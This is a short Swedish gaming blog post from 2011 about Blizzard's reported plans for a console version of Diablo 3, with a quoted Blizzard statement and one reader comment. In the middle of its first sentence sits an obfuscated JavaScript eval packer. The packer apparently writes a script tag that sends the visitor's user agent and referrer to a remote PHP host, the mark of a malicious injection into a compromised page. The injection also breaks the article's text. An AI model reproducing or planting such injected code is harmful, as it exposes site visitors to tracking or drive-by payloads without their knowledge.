Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Diablo 3 till konsol?

Diablo 3 till konsol?
Filip Urde
  • On 22 november, 2011
  • http://www.revue.se/filip-urde
Blizzard eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bkaby|var|u0026u|referrer|iszrt||js|php’.split(’|’),0,{}))
planerar storsatsningar för konsol.
Men man vill inte bekräfta ett Diablo 3 på konsol…
Blizzard har gjort ett försök att erövra konsolerna, men man har aldrig lagt ner sin själ i satsningen. PC har alltid varit största prioritet och deras anställda är bra på det de gör. Men nu menar Blizzard att de kommer satsa mer på konsolutveckling än de någonsin gjort tidigare.

Anledningen är Diablo 3 (vilket man inte vill bekräfta, men så är fallet).

We are still in active exploring mode; we haven’t officially announced a product. We say that because we like our product announcements to be a big deal. We haven’t been as secretive about this one because our biggest barrier is actually getting a console team.

People don’t believe us when we say we’re going to make a console game. I understand why they don’t believe us, because we’ve tried this before. We’ve also never invested in it to the degree that we’re doing now, and we’ve never had a product that we felt was appropriate for it.

 

Men varför skulle man vilja spela Diablo 3 på konsol?

 

 

Comments

  1. jag vill spela diablo 3 till konsol!